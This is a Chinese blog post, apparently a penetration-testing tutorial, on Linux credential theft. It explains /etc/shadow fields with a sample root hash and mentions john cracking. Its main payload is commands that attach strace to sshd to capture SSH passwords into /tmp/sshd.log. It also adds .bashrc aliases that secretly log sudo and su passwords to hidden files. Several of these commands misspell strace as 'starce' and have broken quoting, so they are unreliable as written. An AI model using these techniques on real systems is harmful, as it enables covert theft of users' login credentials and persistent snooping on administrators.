凭证获取:Linux凭证获取

已于 2024-05-19 21:58:52 修改
阅读量1.2k 收藏 20
点赞数 27
分类专栏: 安全 ATT&CK 内网渗透 文章标签: 网络 安全 服务器 linux 数据库 web安全 运维
于 2024-02-15 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/136113384
版权
安全 同时被 3 个专栏收录
155 篇文章 10 订阅
订阅专栏
内网渗透
18 篇文章 0 订阅
订阅专栏
ATT&CK
16 篇文章 1 订阅
订阅专栏
本文详细解读了Linux系统的shadow文件,包括其组成、作用以及如何防止密码破解。介绍了利用strace工具监控密码和sudo/su凭据的方法,强调了安全防范的重要性。
摘要由CSDN通过智能技术生成

目录

shadow文件详解

1.Shadow文件的组成与作用

2.破解Shadow文件内容

利用strace记录密码

shadow文件

1.Shadow文件的组成与作用

在Linux中,/etc/shadow文件又被称为“影子文件”,主要用于存储Linux文件系统中的用户凭据信息。该文件只能由root权限用户操作,我们可以执行cat /etc/shadow来查看shadow文件内容:

重点在最后一行代码,它被分为了9段,各个段的内容说明如下:

  1. 用户名:这个字段包含用户的登录名,用于标识用户的身份。

  2. 加密密码:这个字段包含经过加密后的用户密码。实际的密码并不直接存储在这个文件中,而是经过加密后的密文。

  3. 上次修改密码日期:这个字段包含用户密码最后一次修改的日期,以天数表示。

  4. 密码最小修改间隔:这个字段表示两次修改密码之间的最小间隔,以天数表示。如果用户在这段时间内修改密码,系统会拒绝修改。

  5. 密码最大使用期限:这个字段表示密码的最大使用期限,以天数表示。超过这个期限后,用户需要修改密码。

  6. 密码过期警告期限:这个字段表示密码过期前的警告期限,以天数表示。在密码过期前指定的天数内,系统会提醒用户修改密码。

  7. 密码失效日期:这个字段表示密码失效的日期,以天数表示。超过这个日期后,用户将无法登录系统。

  8. 帐号失效日期:这个字段表示帐号失效的日期,以天数表示。超过这个日期后,用户将无法登录系统。

  9. 保留字段:这个字段是保留字段,目前未被使用,通常为空或包含一些系统保留信息。

例如:

root:$6$ltMA.KzRjM5KtHfw$nZDcIGLFIO90nDa7FzgATw2z5VDCp25cZmoaVU6Qye47drny4PBTOGJvUI6RxNyWhXQpGCTGH.R0Yl7c5fZ
UH0::0:99999:7:::

2.破解Shadow文件内容

如果用户设置的密码过于简单,则即便是加密了也没有什么用,此时攻击者可以使用john工具通过碰撞的方式来破解加密内容,到那时需要具有root用户权限来读取shadow文件。

在Kail中可以将某一行的内容写入到txt文件中,然后执行下面命令来解密:

可以看到,并没有解密,因此并不是所有的密文都可以解密的

注:没有该工具可以直接使用apt-get/yum进行下载

利用strace记录密码

Strace是一个很好用的系统调用跟踪工具,我们可以将该工具附加到程序进程中,来获取该进行的系统调用及参数,但是攻击者也可以通过该工具监听与凭证相关的可执行文件来获取凭据内容

strace不是系统自带的,需要下载:

yum install strace

安装完成后,执行下面命令来开启strace并记录ssh凭据,当目标使用ssh登录后,凭据就会保存在/tmp/sshd.log中

starce -f -F -p `ps aux| grep "sshd -D"|grep -v grep|awk {"print $2"}` -t -e trace=read,write -s 32 2> /tmp/sshd.log

最后再通过下列命令来读取凭据:

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log

除此之外还可以利用Strace记录sudo与su的凭据信息,使用命令别名的方式是将sudo与strace进行捆绑,在执行sudo的同时会调用starce进行记录

先执行命令vim ~/.bashrc添加命令别名,添加的代码如下:

alias sudo='starce -f -e trace=read,write -o /tmp/.sudo-`date ' +%d%h%m%s'`.log -s 32 sudo' 
alias su='starce -f -e trace=read,write -o /tmp/.su-`date ' +%d%h%m%s'`.log -s 32 su'

写入内容后,执行命令来使别名生效

source ~/.bashrc
未知百分百
关注
专栏目录
Linux下登录凭证窃取技巧
09-27 4万+
当获得一台主机的root权限,我们总是会想办法通过收集各种密码凭证,以便继续扩大战果。Linux下的环境,相对比更纯粹一些,介绍几个比较常见的技巧和工具。 关键词:凭证窃取、口令收集、密码抓取、密码嗅探 01、history记录敏感操作 Linux系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致敏感信息泄露。 02、shadow文件破...
Linux系统编程:(5)进程凭证
Golden_Knight的博客
01-04 295
一、进程凭证 每个进程都有一套用数字表示的用户ID(UID) 和组ID(GID),有时将这些ID称之为进程凭证,具体如下图所示: 1. 实际用户ID和组ID 实际用户ID和组ID确定了进程所属的组,标识我是谁。 2.有效用户ID和有效组ID 当进程尝试执行各种系统调用的时候,将结合有效用户ID、有效组ID及辅助ID来确定赋予进程的权限。 例如,当进程访问一些文件、进程间通信对象之类的系统资源时,...
linux 密码文件 /etc/shadow,SHA512 破解
自我---追梦的博客
07-06 9104
{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}所有伪用户的密码都是 “!” 或 “*”,代表没有密码是不能登录的。当然,新创建的用户如果不设定密码,那么它的密码项也是 “!注意,这串密码产生的乱码不能手工修改,如果手工修改,系统将无法识别密码,导致密码失效。比较复杂的密码,进行破解花费的时间会长一些。
shadow文件解析
最新发布
M1665487923的博客
07-02 595
通过shadow文件得到账号密码
Linux登录凭证窃取二三
sash1mi
10-21 404
Linux登录凭证窃取二三 1、history命令记录敏感操作 Linux系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致历史敏感信息泄露。 2、mimipenguin抓取密码 github下载地址:https://github.com/huntergregal/mimipenguin Linux下的密码抓取神器,需要root权限运行,通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证,目前支持Kali、Ubnutu等操作系统。 (没有显示密码
linux进程凭证(权限)
戴磊的博客
05-21 1049
原文地址http://daileinote.com/computer/linux_sys/07 每个进程都有一套用数字表示的用户id和组id,这些id决定了进程执行时具体的权限。 实际用户id和实际组id 这2个id决定了进程所属的用户和组。假设我们用root用户登录,那么我们在shell中创建的新进程都会从父进程shell中继承这些id。 有效用户id和有效组id 进程将结合有效用户id...
Linux获取登录凭证总结
weixin_44747030的博客
02-20 5909
Linux获取凭证总结 前言 文章仅做学习交流 在内网渗透中,有时往往只需要一个凭证,撕开一个口子,慢慢的就能打通整个内网,下面会介绍在内网中碰到linux机器如何获取凭证的方法。 history记录 linux的history命令的作用是,记录执行过的命令。 这里可以看到当前在使用的shell是zsh,而在每个用户下都会生成一个文件.shell名_history的文件(如.zsh_history),在关闭终端后才会输入到该文件。 输入history查看执行过的命令 而在这里面可以分析到管理员会在这台
操作系统登录凭证获取
weixin_43835473的博客
10-16 1066
最近看了一些关于获取操作系统登录凭证的文章,当我们通过渗透获取到一台服务器权限之后,为了扩大战果,我们可以总是会想办法通过收集各种密码凭证,曾经就遇到过有客户所有服务器都是统一的账号密码,被拿到一台服务器的账号密码后,其他服务器也都被轻松拿下。因此在此记录一些密码凭证获取方法。 Linux登录凭证 测试环境:CentOS7 1.strace收集 strace是一个动态跟踪工具,堪比键盘记录器 (1)抓取进程sshd中的明文密码输入 /tmp/.sshd.log (strace -f -F -p `ps a
imx6ull:Linux内核启动流程分析
linux驱动开发大纲
03-03 875
/usr/local/arm/gcc-linaro-4.9.4-2017.01-x86_64_arm-linux-gnueabihf/bin/arm-linux-gnueabihf-ld -EL --defsym _kernel_bss_size=463200 -p --no-undefined -X -T arch/arm/boot/compressed/vmlinux.lds arch/arm/boot/compressed/head.o arch/arm/boot/compressed/pig...
aws-sso:适用于AWS SSO凭证的命令行工具
05-02
该软件包提供了一个命令行界面,可通过获取AWS凭证。 aws-cli软件包适用于Python版本: 3.7.x及更高版本 注意力! 该软件包依赖和Google Chrome才能工作。 因此,您需要安装和 。 这是在macOS上开发和测试的,...
springboot连接服务器登录harbor私人仓库并获取登录凭证供k8s拉取私人仓库镜像时使用
yuanyaunlv的博客
03-20 589
引入包 <dependency> <groupId>com.jcraft</groupId> <artifactId>jsch</artifactId> <version>0.1.53</version> </dependency&g...
Linux——/etc/shadow文件(管理用户和组)
热门推荐
hutongkoudemihu的博客
06-25 1万+
/etc/shadow文件是/etc/passwd的影子文件,二者之中的记录行是一一对应的。这个文件并不由/etc/passwd而产生的,而是由pwconv命令根据/etc/passwd文件中的数据字段生成。这两个文件是应该是对应互补的 shadow内容包括用户及被加密的密码以及其它/etc/passwd不能包括的信息,比如用户的有效期限等; 这个文件只有root权限可以读取和操作,权限如下:/etc/shadow的权限不能随便改为其它用户可读,这样做是危险的。如果你发现这个文件
Linux中/etc下面passwd和shadow文件介绍
m0_72731342的博客
03-26 1241
SYS_GID_MAX(number),SYS_GID_MIN(number) useradd、groupadd或newusers创建的系统组的组ID范围。SYS_UID_MAX(number),SYS_UID_MIN(number) useradd或newusers创建的系统用户的用户ID的范围。3.用户UID值,一般情况下,root的UID为0,1-499默认为系统账号,有的更大些到1000,500-65535为用户的可登录账号,有的系统从1000开始。如果不指定,就假定为-1,这会禁用此限制。
linux查看shadow文件权限,Linux如何查找shadow文件进入?这样几步轻松搞定!
weixin_30695203的博客
04-30 4136
Linux系统中,用来存储用户的密码信息的文件一般又叫“影子文件”(shadow文件),最近小编收到很多小白反馈,自己在操作linux系统时不知道怎么找到这些影子文件,究竟要怎么做才能在linux系统中找到影子文件呢?今天小编就为大家分享一下Linux查找shadow文件并进入的方法。方法步骤1、首先使用root帐户登录linux系统或者服务器。注:因为shadow这个文件的权限是 000,所以...
Linux下passwd与shadow的关系
写作是为了更好的思考
12-11 1244
在Unix系统中,存在两个重要的文件用于存储用户账号信息和密码哈希值,它们分别是和。这两个文件在系统中扮演着不同的角色,了解它们之间的区别和作用对于系统安全至关重要。
Linux pwconv命令教程:创建和管理shadow密码文件(附实例详解和注意事项)
u012964600的博客
04-03 650
pwconv是一个Linux命令,它用于从passwd文件和一个可选的现有shadow文件创建shadow文件。如果在主文件中不存在的shadow文件中的条目将被删除。然后,主文件中密码不为x的shadow条目将被更新。任何缺失的shadow条目将被添加。最后,主文件中的密码将被替换为x。
1 linux网络诊断命令工具_linux诊断网络故障命令(1)
2401_83974173的博客
04-27 547
12、DNS和NS查找工具14、Batfish15、Fiddler17、nload实时监控网络带宽CPU 方面内存IO 设备(磁盘、网络网络工具mtr更多介绍 : https://mp.weixin.qq.com/s/-lru6FAhkXTo7gLCCfWlyg。
Linux密码破解(非远程爆破)
qq_42465440的博客
08-10 3547
Linux系统账号密码破解
【CentOS Linux 7】实验3【用户组群管理、磁盘分区及文件系统管理】
upward
09-30 2847
【实验目的】 【实验步骤】 (1)说明/etc/passwd,/etc/shadow,/etc/group,/etc/gashadow四个文件的作用,以及每个文件中以其中第一行为例,解释各个字段的含义。 1:/etc/passwd 2:/etc/shadow 3:/etc/group 4:/etc/gashadow (2)举例说明passwd、useradd、groupadd、su四个命令用法。 1、passwd 2、useradd 3、groupadd 4、su (3)什么是磁盘分
修复安全漏洞:Linux系统OpenSSH升级指南
当ChallengeResponseAuthentication启用时,攻击者可以通过S/Key暴力尝试获取用户的凭证。由于系统在账户存在时会返回不同的响应,攻击者可以据此推断出合法的OpenSSH用户名,从而对系统的安全性构成威胁。 为了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值